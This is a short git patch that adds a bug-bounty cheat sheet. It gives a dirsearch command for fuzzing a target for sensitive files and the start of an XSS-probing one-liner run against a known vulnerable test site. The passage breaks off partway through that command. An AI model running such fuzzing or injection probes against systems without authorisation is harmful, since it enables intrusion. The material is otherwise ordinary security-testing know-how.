From 048e3884ef8cfd0c0de9c103e1a46effb9edd4bd Mon Sep 17 00:00:00 2001 From: Mehdi Date: Wed, 31 Jul 2024 15:44:31 +0330 Subject: [PATCH] Create writeups.md --- writeups.md | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 writeups.md diff --git a/writeups.md b/writeups.md new file mode 100644 index 0000000..a62b8a5 --- /dev/null +++ b/writeups.md @@ -0,0 +1,29 @@ +# Writeups (Golden tips) + +## Information Disclosure +```bash +# directory fuzzing for sensitive files +dirsearch -u “https://target.com” -t 150 -x 403,404,500,429 -i 200,301,302 --random-agent +``` +## Reflected XSS (Non-Persistent XSS) +```bash +# XSS one liner +echo "testphp.vulnweb.com" | gauplus | grep "?" | qsreplace 'xssz">